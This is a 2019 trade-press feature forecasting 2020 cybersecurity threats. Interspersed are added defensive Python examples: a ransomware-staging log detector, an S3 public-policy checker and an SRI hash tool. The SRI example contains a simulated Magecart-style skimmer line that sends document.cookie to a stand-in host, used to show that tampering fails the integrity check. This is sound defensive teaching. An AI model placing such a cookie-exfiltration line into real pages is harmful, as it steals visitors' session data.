mnadeau
Senior Editor

2020 cybersecurity trends: 9 threats to watch

Feature
Dec 12, 2019 | 17 mins
Internet Security, Malware, Security

Here's how your biggest threats of 2019 will likely trend for 2020 and how you might change your defensive strategy for them.

Making cybersecurity predictions is fun, but not necessarily helpful to security professionals who must decide which threats they should be most prepared for. “You can’t really make a good prediction about what the future’s going to hold because it’s always the stuff that comes out of left field that really becomes the problem,” says Chad Seaman, senior engineer on Akamai’s security intelligence response team.

If your biggest threat for 2020 is something new and unpredictable, how can you best focus your efforts in the coming year? Start by looking at how this year’s biggest threats are likely to change in 2020 in terms of scale and tactics.

CSO has reviewed the leading research on the most common, significant threats of 2019 and asked those researchers for their advice on where those threats will trend and how organizations might adjust their defenses against them in 2020. Here’s what we learned.

Malware infections of devices

Protecting endpoints has continued to be a battle for organizations. About half of all organizations suffered a malware infection on company-owned devices in 2019, according to Kaspersky’s IT Security Economics in 2019 report. Half also saw malware infections on employee-owned devices.

For the enterprise, malware infections on company devices were the most expensive incident type cited in the Kaspersky report, with an average cost per incident of $2.73 million. That number was significantly lower for SMBs, at $117,000.

What to expect in 2020: Dmitry Galov, security researcher at Kaspersky, sees the risk from employee-owned devices increasing in 2020. He sees a greater willingness for companies to allow employees to use their own devices to cut costs, enable remote work, and increase employee satisfaction. As a result, attackers will target personal devices as a way to bypass corporate defenses. “By default, users’ personal devices tend to be less protected than corporate devices as the average users seldom apply additional measures to protect their phones and computers from potential threats,” he says. “As long as this trend continues, company and employee-owned device infections will arise. This vector of attack remains attractive because the attacker no longer needs to target corporate accounts (for instance, with phishing emails sent to corporate mail).”

Best advice for 2020: Companies must review and update their policies around personal devices, and then enforce those policies, Galov believes. “Strict company policies regarding security, correct rights management and provision of users with security solutions are on the list of must haves to protect the company and its data,” he says. “As well as managing technical issues, security awareness trainings are important because they can cultivate standards of cyber hygiene among employees.”

Phishing

Nearly a third of all breaches in the past year involved phishing, according to the 2019 Verizon Data Breach Investigations Report. For cyber-espionage attacks, that number jumps to 78%. The worst phishing news for 2019 is that its perpetrators are getting much, much better at it thanks to well-produced, off-the-shelf tools and templates.

Akamai’s SOTI Report: Baiting the Hook broke down the phishing-as-a-service offered by one phishing kit developer. This developer has a storefront and advertises on social media. Prices start at $99 and go up depending on the mailing services selected. All the kits come with security and evasion features. “The low prices and top-tier brand targets are attractive, creating a low bar for entry into the phishing market for criminals looking to set up shop,” said the report’s authors. Among those top-tier brands targeted are Target, Google, Microsoft, Apple, Lyft and Walmart.

What to expect in 2020: Phishing kit developers will offer more refined products, further lowering the skill required to launch a phishing campaign. According to the IDG Security Priorities Study, 44% of companies say that increasing security awareness and staff training is a top priority for 2020. Attackers will respond by improving the quality of their phishing campaigns, minimizing or hiding the common signs of a phish. Expect greater use of business email compromise (BEC), too, where an attacker sends legitimate-looking phishing attempts through fraudulent or compromised internal or third-party accounts.

Best advice for 2020: Keep your anti-phishing training up to date and make it ongoing. To combat BEC, have policies in place that require any employee receiving a request regarding money or payment instructions to confirm it by phone, using a number already on file rather than one supplied in the message itself.

Ransomware attacks

Ransomware attacks are not the most common cybersecurity incident, but they can be among the most costly. Roughly 40% of SMBs and enterprises experienced a ransomware incident in 2019, according to Kaspersky’s IT Security Economics in 2019 report. At the enterprise level, the average cost per incident was $1.46 million.

Endpoint protection tools are getting better at detecting ransomware, but that has made ransomware developers better students of the techniques those tools use, according to the Sophos Labs 2020 Threat Report. “It is a lot easier to change a malware’s appearance than to change its purpose or behavior, which is why modern ransomware relies on obfuscation to be successful,” says Mark Loman, director of engineering for next-generation tech at Sophos. “However, in 2020, ransomware will raise the stakes by changing or adding traits to confuse some anti-ransomware protection.”

Some of that obfuscation is to make the ransomware appear to come from a trusted source: it is pushed out with legitimate administrative tooling and a stolen privileged account, so the deployment looks like routine IT work. The Sophos report cites several examples:

  • Crafting a script that lists the targeted machines and combines them with the PsExec utility from Microsoft Sysinternals, a privileged domain account, and the ransomware binary
  • Leveraging a logon/logoff script delivered via a Windows Group Policy Object
  • Abusing Windows Management Instrumentation (WMI) to mass-distribute the ransomware inside a network
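The three distribution patterns above each leave a distinctive trace in the Windows Security log. The following is an added example, not code from Sophos or from the article: a small detector that labels those traces and, more usefully, flags one account staging execution on many hosts in a short span, which is what a mass deployment looks like regardless of the tool used. The event IDs and field names are real (4697 service installed, 4688 process created, 5136 directory object modified); the host names, account names and records are constructed for the example.

```python
# Added example (not from Sophos or the article): flag ransomware staging via PsExec,
# WMI and GPO edits in constructed Windows Security-log records, then report any
# account that touched several hosts. Records, hosts and accounts are made up.
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass
class Event:
    event_id: int                     # Windows Security event ID
    host: str                         # computer that logged the event
    fields: dict = field(default_factory=dict)


SAMPLE_EVENTS = [  # constructed
    Event(4688, "ws01", {"NewProcessName": r"C:\Windows\System32\notepad.exe",
                         "ParentProcessName": r"C:\Windows\explorer.exe",
                         "SubjectUserName": "alice"}),
    # PsExec installs and starts the PSEXESVC service on every host it is pointed at.
    Event(4697, "fs01", {"ServiceName": "PSEXESVC",
                         "ServiceFileName": r"%SystemRoot%\PSEXESVC.exe",
                         "SubjectUserName": "svc_backup"}),
    Event(4697, "db01", {"ServiceName": "PSEXESVC",
                         "ServiceFileName": r"%SystemRoot%\PSEXESVC.exe",
                         "SubjectUserName": "svc_backup"}),
    # WMI remote execution: the payload is spawned as a child of WmiPrvSE.exe.
    Event(4688, "ws07", {"NewProcessName": r"C:\Users\Public\update.exe",
                         "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
                         "SubjectUserName": "svc_backup"}),
    # A GPO object edited in AD (5136 only fires if the GPO carries an audit SACL).
    Event(5136, "dc01", {"ObjectClass": "groupPolicyContainer",
                         "AttributeLDAPDisplayName": "gPCMachineExtensionNames",
                         "SubjectUserName": "svc_backup"}),
]


def classify(ev):
    """Return a technique label for one event, or None if nothing matches."""
    f = ev.fields
    if ev.event_id == 4697:
        blob = (f.get("ServiceName", "") + " " + f.get("ServiceFileName", "")).upper()
        if "PSEXESVC" in blob:
            return "psexec_service_install"
    elif ev.event_id == 4688:
        if f.get("ParentProcessName", "").lower().endswith("wmiprvse.exe"):
            return "wmi_remote_process"
    elif ev.event_id == 5136:
        if f.get("ObjectClass") == "groupPolicyContainer":
            return "gpo_modified"
    return None


def detect(events, spread_threshold=2):
    """Label events and report accounts that staged execution on many hosts.

    Returns (findings, spread): findings is a list of (host, technique, account);
    spread maps account -> sorted hosts for accounts at or above the threshold.
    """
    findings = []
    hosts_by_account = defaultdict(set)
    for ev in events:
        label = classify(ev)
        if label is None:
            continue
        account = ev.fields.get("SubjectUserName", "?")
        findings.append((ev.host, label, account))
        hosts_by_account[account].add(ev.host)
    spread = {acct: sorted(hosts) for acct, hosts in hosts_by_account.items()
              if len(hosts) >= spread_threshold}
    return findings, spread


if __name__ == "__main__":
    found, spread = detect(SAMPLE_EVENTS)
    for host, label, acct in found:
        print(f"{host}: {label} by {acct}")
    for acct, hosts in spread.items():
        print(f"ALERT: {acct} staged execution on {len(hosts)} hosts: {', '.join(hosts)}")
```

The per-event labels are easy to evade (PsExec can rename its service with `-r`, and a dropper can be launched from something other than WmiPrvSE.exe), which is why the cross-host aggregation is the part worth keeping: a single account installing services or editing policy on many machines within minutes is rarely legitimate, whatever the binary is called.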

What to expect in 2020: Loman sees ransomware attackers continuing to tweak their methods to give themselves an edge. “Among the most notable advancements is an increase in ransomware attackers raising the stakes with automated, active attacks that blend human ingenuity with automation tools to cause maximum impact,” he says. “Additionally, by encrypting only a relatively small part of each file or booting the operating system to a diagnostic mode where anti-ransomware protection is often unavailable, attackers will continue to evade most defenses.” 

“Ransomware attacks have been loud this year and there is no reason for this type of threat to decline,” says Kaspersky’s Galov. “Ransomware increasingly targets infrastructure, organizations and even smart cities.”

Ransomware developers will make their code more evasive so that they can establish a foothold in a system, encrypt more data without being noticed, and possibly scale operations to other networks. “This year we saw the appearance of attacks even on Network Attached Storage (NAS), which is largely considered secure and safe from such threats,” says Galov.

Best advice for 2020: As always, the best defense against ransomware is to have current, tested backups of all critical data. Keep those backups isolated from your network (offline, or at least not writable from production systems and domain accounts) so they, too, aren’t encrypted by the ransomware. Employee training is critical, too. “In order to protect themselves from ransomware, organizations need to implement strict security policies and introduce cybersecurity trainings to the employees,” says Galov. “Additional protective measures, such as securing access to data, ensuring its backups are stored securely and implementing application whitelisting techniques on servers, are required.”

“It is vital to have robust security controls, monitoring and response in place covering all endpoints, networks and systems, and to install software updates whenever they are issued,” says Loman.

Third-party supplier risk

Both enterprises and SMBs saw incidents involving third-party suppliers (both services and products) at a similar rate, 43% and 38%, respectively, according to Kaspersky’s IT Security Economics in 2019 report. Most organizations (94%) grant third-party access to their network, according to a survey by One Identity, and 72% grant privileged access. Yet only 22% felt confident those third parties weren’t accessing unauthorized information, while 18% reported a breach due to third-party access.

The Kaspersky study shows that both SMBs and enterprises are forcing third-party suppliers to sign security policy agreements—75% of SMBs and 79% of enterprises use them. That’s making a big difference when it comes to getting compensation from third parties when they are responsible for a breach. Of enterprises with a policy in place, 71% reported they received compensation, while only 22% of companies without a policy received compensation.

What to expect in 2020: Businesses will become more digitally connected with their suppliers and partners. That raises risk as well as awareness of that risk. Unfortunately, attackers are becoming more sophisticated.

“Recently, we’ve observed some new groups such as BARIUM or APT41 engage in sophisticated supply chain attacks against software and hardware manufacturers in order to penetrate secure infrastructures around the world,” says Galov. “These include two sophisticated supply chain attacks uncovered in 2017 and 2019: the CCleaner attack and ShadowPad, and other attacks against gaming companies. Dealing with a compromise from one of these threat actors is a complex process, as they usually leave backdoors allowing them to return later and cause even more havoc.”

Best advice for 2020: Know who has access to your networks and ensure they have only the privileges they need. Have policies in place for communicating and enforcing rules for third-party access. Make sure you have a security policy in place for all your third-party suppliers that spells out responsibilities, security expectations, and what happens when an incident occurs.

“The best organizations can do to protect themselves from such attacks is to make sure that not only they, but also their partners, follow high cybersecurity standards,” says Galov. “If third-party suppliers get any kind of access to internal infrastructure or data, cybersecurity policies should be established before the integration process.”

DDoS attacks

Forty-two percent of enterprises and 38% of SMBs experienced a distributed denial of service (DDoS) attack in 2019, according to Kaspersky’s IT Security Economics in 2019 report. That’s on par with ransomware incidents, which get much more media attention. From a financial perspective, DDoS attacks cost SMBs an average of $138,000. 

Attackers continue to innovate to improve the effectiveness of their DDoS attacks. In September, for example, Akamai reported a new DDoS vector: Web Services Dynamic Discovery (WSD), a multicast discovery protocol that locates services on a local network over UDP port 3702. It was never meant to be reachable from the internet, but many consumer and IoT devices expose it anyway. Attackers send small discovery requests with a spoofed source address to those misconfigured devices, which answer the victim with much larger responses, so the exposed devices act as reflectors that amplify the attack at scale.

What to expect in 2020: Kaspersky’s Galov sees DDoS attacks staying “quite prominent” in 2020 thanks to the rise of 5G and numbers of IoT devices. “The conventional boundaries of critical infrastructure such as water supply, energy grid, military facilities and financial institutions will expand much further to other unprecedented areas in a 5G-connected world,” he says. “All these will require new standards of safety, and the increased speed of connection will pose new challenges in stopping DDoS attacks from happening.”

Best advice for 2020: Do everyone a favor and check your internet-connected devices for misconfigurations and unpatched vulnerabilities. “It’s security hygiene, basic security hygiene,” says Akamai’s Seaman.

Unfortunately, that won’t help the risk of DDoS attacks aided by connected consumer devices. “Grandma going to Best Buy to pick up a new webcam to put on the driveway so she can see who pulls in isn’t going to know about the hygiene of this device,” says Seaman. “That’s where we continue to see the bigger problems, and it’s not grandma. It’s really some guy in Vietnam who has a DVR security system for his small shop. The last of his concerns is whether his webcam is being used to DDoS a bank.”

Application vulnerabilities

According to Veracode’s State of Software Security Vol. 10 report, 83% of the 85,000 applications it tested had at least one security flaw. Many had far more: the research found a total of 10 million flaws, and 20% of all apps had at least one high-severity flaw. That leaves a lot of opportunity in terms of potential zero-day vulnerabilities and exploitable bugs for attackers to take advantage of.

The report authors see optimism in some of the data. Fix rates, especially for high-severity flaws, are improving. The overall fix rate is 56%, up from 52% in 2018, and the highest severity flaws are fixed at a rate of 75.7%. The biggest positive, however, is that a DevSecOps approach with frequent scanning and testing of software will drive down the time to fix flaws. Median time to repair for applications scanned 12 times or fewer per year was 68 days, while an average scan rate of daily or more lowered that rate to 19 days.

What to expect in 2020: Despite the best efforts of security and development teams, vulnerabilities will continue to creep into software. “Most software today is very insecure. That will continue in 2020, especially with 90% of applications using code from open-source libraries,” says Chris Wysopal, co-founder and CTO at Veracode. “We’ve seen some positive AppSec signs in 2019. Organizations are increasingly focused on not just finding security vulnerabilities, but fixing them, and prioritizing the flaws that put them most at risk…. Our data suggests that finding and fixing vulnerabilities is becoming just as much a part of the process as improving functionality.”

Best advice for 2020: As the Veracode research shows, scanning and testing your apps for vulnerabilities more frequently while prioritizing the most severe flaws to be fixed is an effective defense. Wysopal also urges companies to keep an eye on security debt. “One of the growing threats within application security is the notion of security debt – whether applications are accruing or eliminating flaws over time,” he says. A growing security debt leaves organizations exposed to attacks.

“Just as with credit card debt, if you start out with a big balance and only pay for each month’s new spending, you’ll never eliminate the balance,” Wysopal says. “In AppSec, you have to address the new security findings while chipping away at the old.”

Cloud services/hosted infrastructure incidents

Forty-three percent of enterprise businesses had security incidents that affected third-party cloud services in 2019, according to Kaspersky’s IT Security Economics in 2019 report. Although cloud-related incidents didn’t make the SMB most-frequent list, they were expensive for smaller companies, which often are more dependent on hosted services. The average cost of an incident that affected hosted infrastructure for SMBs was $162,000.

One area that saw an uptick in activity in 2019 was online payment fraud. The Magecart criminal group (in practice an umbrella for several card-skimming crews) was particularly busy this past year. It injects card-skimming JavaScript into checkout pages, in some cases by taking advantage of cloud misconfigurations, such as storage buckets that anyone can write to, to modify the shopping cart code a site serves. The businesses using the online ecommerce services are unaware of the change until customers complain of fraudulent charges.

Organizations still need to worry about misconfiguring cloud services in a way that leaves data exposed on the internet. Attackers regularly scan the internet to grab this exposed data. Fortunately, cloud platform vendors such as Amazon and Google have rolled out new tools and services in 2019 to help organizations properly configure their cloud systems and find errors that leave data unprotected.
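The misconfiguration that exposes data, and the one that lets a skimmer be written into a served script, are often the same thing: a bucket policy that grants “anyone” read or write. As an added example that is not from the article or from any cloud vendor’s tooling, the check below evaluates constructed S3 bucket policies (the JSON shape `aws s3api get-bucket-policy` returns) offline, and takes the bucket’s Block Public Access setting into account so that a latent wildcard grant is reported differently from a live exposure. Bucket names, the VPC endpoint ID and the policies are made up.

```python
# Added example, not from the article or any cloud vendor's tooling: an offline check
# of constructed S3 bucket policies for grants to anyone, combined with the bucket's
# Block Public Access flags. Bucket names, policies and the vpce ID are made up.
import fnmatch

# Concrete actions that mean "anyone can read" / "anyone can write or delete".
READ_ACTIONS = ("s3:getobject",)
WRITE_ACTIONS = ("s3:putobject", "s3:deleteobject")


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _principal_is_anyone(principal):
    # Both `"Principal": "*"` and `"Principal": {"AWS": "*"}` are anonymous grants.
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))


def _covers(policy_actions, dangerous):
    # Policy actions may be wildcards (s3:Get*, s3:*, *): ask whether each policy
    # pattern matches a concrete dangerous action, never the reverse.
    return any(fnmatch.fnmatchcase(d, a) for a in policy_actions for d in dangerous)


def public_statements(policy):
    """Return [(sid, 'read'|'write', has_condition)] for Allow statements open to anyone."""
    out = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _principal_is_anyone(stmt.get("Principal")):
            continue
        actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
        conditioned = bool(stmt.get("Condition"))
        for kind, dangerous in (("read", READ_ACTIONS), ("write", WRITE_ACTIONS)):
            if _covers(actions, dangerous):
                out.append((stmt.get("Sid", "<no sid>"), kind, conditioned))
    return out


def assess(bucket):
    """Classify one bucket: public-write, public-read, review, blocked or ok."""
    findings = public_statements(bucket.get("policy") or {})
    if not findings:
        return "ok"
    # RestrictPublicBuckets makes S3 ignore public grants in the policy, so the
    # wildcard statement is a latent problem rather than an exposure today.
    if bucket.get("public_access_block", {}).get("RestrictPublicBuckets"):
        return "blocked"
    if any(kind == "write" and not cond for _, kind, cond in findings):
        return "public-write"
    if any(kind == "read" and not cond for _, kind, cond in findings):
        return "public-read"
    return "review"  # only conditioned grants (e.g. limited to a VPC endpoint): check by hand


def scan(buckets):
    return {b["name"]: assess(b) for b in buckets}


SAMPLE_BUCKETS = [  # constructed
    {"name": "shop-assets", "public_access_block": {}, "policy": {
        "Version": "2012-10-17", "Statement": [{"Sid": "AllowAnyRead", "Effect": "Allow",
        "Principal": "*", "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::shop-assets/*"}]}},
    {"name": "checkout-js", "public_access_block": {"RestrictPublicBuckets": True}, "policy": {
        "Version": "2012-10-17", "Statement": [{"Sid": "Legacy", "Effect": "Allow",
        "Principal": {"AWS": "*"}, "Action": ["s3:GetObject", "s3:PutObject"],
        "Resource": "arn:aws:s3:::checkout-js/*"}]}},
    {"name": "cdn-origin", "public_access_block": {}, "policy": {
        "Version": "2012-10-17", "Statement": [{"Sid": "VpceOnly", "Effect": "Allow",
        "Principal": "*", "Action": "s3:Get*", "Resource": "arn:aws:s3:::cdn-origin/*",
        "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}}]}},
    {"name": "logs", "public_access_block": {"RestrictPublicBuckets": True}, "policy": None},
]

if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_BUCKETS).items():
        print(f"{name}: {verdict}")
```

A “blocked” verdict still deserves a ticket: the wildcard statement becomes a live exposure the moment someone relaxes Block Public Access, and bucket ACLs (not modelled here) are a second, independent path to the same result.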

What to expect in 2020: The staying power of the malicious code and the financial reward (Magecart’s haul alone is estimated to be millions of dollars) means online payment fraud will increase in 2020. Magecart’s success is bound to inspire imitators. Organizations will counter this and other cloud threats by spending more on cloud security. According to the IDG Security Priorities Study, only 27% of organizations have cloud data protection technology in production, but 49% are researching or piloting it.

Best advice for 2020: Conduct source code reviews of your ecommerce scripts and implement subresource integrity (SRI) so that a modified script is not loaded without your permission. Make sure your cloud providers conduct assessments of their own code to prevent fraud. Do regular scans for configuration errors that expose your data on the internet.
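Subresource integrity works by pinning the script tag to a hash of the exact script body; if the served file changes by even one byte, the browser refuses to run it. As an added example that is not part of the article, the code below generates the `integrity` value for a checkout script and reproduces the browser’s check in simplified form, so you can see a skimmed copy fail. The script body is constructed; the digest format (`sha256`/`sha384`/`sha512` followed by the base64 of the raw digest) is the one browsers actually verify.

```python
# Added example (not from the article): generate and verify Subresource Integrity
# values for a checkout script. The script body is constructed; the token format is
# the one browsers check: "<sha256|sha384|sha512>-<base64 of the raw digest>".
import base64
import hashlib

ALLOWED = ("sha256", "sha384", "sha512")

# Constructed stand-in for a vendored checkout/cart script.
CHECKOUT_JS = b"window.checkout = function (cart) { return submit(cart); };\n"


def sri_digest(body: bytes, algo: str = "sha384") -> str:
    """Return an integrity token for body, e.g. 'sha384-...'."""
    if algo not in ALLOWED:
        raise ValueError(f"SRI permits only {ALLOWED}, got {algo!r}")
    raw = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(raw).decode('ascii')}"


def sri_matches(body: bytes, integrity: str) -> bool:
    """Simplified browser semantics: the attribute may list several tokens; an exact
    match on any supported token passes, unknown algorithms are ignored, and a list
    with no usable match fails."""
    for token in integrity.split():
        algo = token.partition("-")[0]
        if algo in ALLOWED and sri_digest(body, algo) == token:
            return True
    return False


def script_tag(src: str, body: bytes) -> str:
    """Emit the <script> tag to paste into the page. crossorigin is required for a
    cross-origin resource, otherwise the browser cannot read it to check the hash."""
    return (f'<script src="{src}" integrity="{sri_digest(body)}" '
            f'crossorigin="anonymous"></script>')


if __name__ == "__main__":
    print(script_tag("https://cdn.example/checkout.js", CHECKOUT_JS))
    pinned = sri_digest(CHECKOUT_JS)
    # A skimmer appended to the file, as a Magecart-style modification would do.
    skimmed = CHECKOUT_JS + b"fetch('https://evil.example/c?d=' + document.cookie);\n"
    print("original loads:", sri_matches(CHECKOUT_JS, pinned))
    print("modified loads:", sri_matches(skimmed, pinned))
```

SRI protects a script you load from somewhere else. It does not help if the attacker can edit the HTML that carries the tag, because they simply replace the hash along with the script, so it belongs alongside, not instead of, reviewing your own templates and keeping the storage that serves scripts non-writable by anonymous principals. Every legitimate update to the script also means regenerating the hash, which is the price of the guarantee.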

IoT vulnerabilities

The internet of things (IoT) and the data it generates was the second most impactful trend on security practitioners in 2019, according to the Security Industry Association (SIA) 2019 Security Megatrends report. The growth of IoT is nothing short of manic and difficult to predict. Research firm Statista estimates there will be between 6.6 billion and 30 billion internet-connected devices in 2020, a range too large to be helpful.

The threat IoT poses has been front of mind in 2019 for most organizations. The Marsh Microsoft 2019 Global Risk Perception Survey found that 66% of respondents saw IoT as a cyber risk; 23% rated that risk “extremely high.” “These IoT devices are soft targets for adversaries because they are often unpatched and misconfigured, and they’re ‘unmanaged’ because they don’t support endpoint security agents,” says Phil Neray, vice president of industrial cybersecurity at CyberX. “As a result, they can easily be compromised by adversaries to gain a foothold in corporate networks, conduct destructive ransomware attacks, steal sensitive intellectual property, and siphon computing resources for DDoS campaigns and cryptojacking.”

CyberX’s 2020 Global IoT/ICS Risk Report breaks down the most common security gaps that made IoT devices vulnerable over the past 12 months. It shows significant improvement in a few areas. The share of sites with remotely accessible devices dropped 30 percentage points, to 54% of surveyed sites. Direct internet connections also fell, from 40% to 27%.

On the downside, outdated operating systems were found at 71% of the sites versus 53% the previous year, and 66% of the sites failed to do automatic antivirus updates compared to 43% the previous year.

What to expect in 2020: Neray sees the risk from exposed IoT devices increasing in 2020 as the number of connected devices increases and ”the motivation and sophistication of nation-state adversaries and cybercriminals increases.” Industrial environments such as energy utilities, manufacturing, chemicals, pharmaceuticals and oil and gas will especially be at risk, he says. “These compromises can lead to even more serious consequences including costly plant downtime, threats to human safety and environmental incidents.”

Neray identifies building management systems (BMS) as a prime target for attackers. “They’re typically deployed by facilities management teams with minimal expertise in security, often unknowingly exposed to the internet, and typically not monitored by corporate security operations centers (SOCs).” 

Best advice for 2020: Neray advises companies to follow a multi-layered defense-in-depth strategy incorporating:

  • Stronger network segmentation
  • Restricted remote access to industrial control networks by third-party contractors, with strong access controls such as 2FA and password vaulting
  • Agentless network security monitoring to rapidly detect and mitigate IoT attacks before adversaries can blow up or shut down facilities

Ultimately, the best defense depends more on organizational than technical approaches. “In the TRITON attack on the safety systems of a petrochemical facility in Saudi Arabia, for example, one of the key deficiencies was that no one considered themselves ultimately responsible for the security of the industrial control network,” says Neray. “As a result, there were serious lapses in security monitoring and no one checked that the firewalls in the DMZ had been properly configured by the outsourced firms that installed them. Our advice for CISOs is to step up to the plate and take ownership of IoT and OT security and treat IoT and OT security in a holistic manner alongside IT security, integrated into your SOC workflows and security stack.”

Cryptojacking

Let’s end this list with some good news: Cryptomining attacks are expected to decline in 2020. Although cryptomining attacks did not make the most-frequent list for either enterprises or SMBs on Kaspersky’s IT Security Economics in 2019 report, they proved costly for enterprises in 2019. The average financial impact for them was $1.62 million.

What to expect in 2020: Cryptomining incidents rise or fall with cryptocurrency values, but the ease with which attackers can execute a cryptojacking scheme means this threat will persist through 2020. “Mining has been steadily declining throughout 2019 and we do not see any reason for this tendency to change,” says Galov. “Cryptomining has become less profitable, not without the influence of cryptocurrencies that have taken the fight against this threat.”

Best advice for 2020: Use a security solution that detects cryptomining threats and keep an eye out for spikes in cryptocurrency values, which will encourage more cryptojacking attacks.